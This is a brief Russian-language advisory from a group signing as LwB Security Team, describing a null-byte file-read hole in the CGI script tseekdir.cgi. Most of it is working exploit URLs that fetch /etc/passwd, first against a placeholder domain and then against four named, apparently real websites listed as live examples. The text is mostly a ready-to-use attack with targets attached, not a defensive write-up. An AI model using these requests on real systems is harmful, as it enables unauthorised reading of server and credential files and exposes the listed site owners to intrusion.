Vulnerability - возможность чтения файлов.
Скрипт tseekdir.cgi не выполняет проверку на "null-byte poison".
Exploit:
http://www.xxx.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
http://www.xxx.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00
Пример:
http://www.uscomputer.net/cgi-bin/cgi/ tseekdir.cgi?location=/etc/passwd%00
http://www.micro2media.com/cgi-bin/ turbo/tseekdir.cgi?location=/etc/passwd%00
http://www.clickonbanner.com/cgi-bin/ search2/cgi/tseekdir.cgi?id= 316&location=/etc/passwd%00
http://www.americanquality.com/cgi-bin/ tseekdir.cgi?id=799&location=/etc/passwd%00
LwB Security Team [lwb57.org]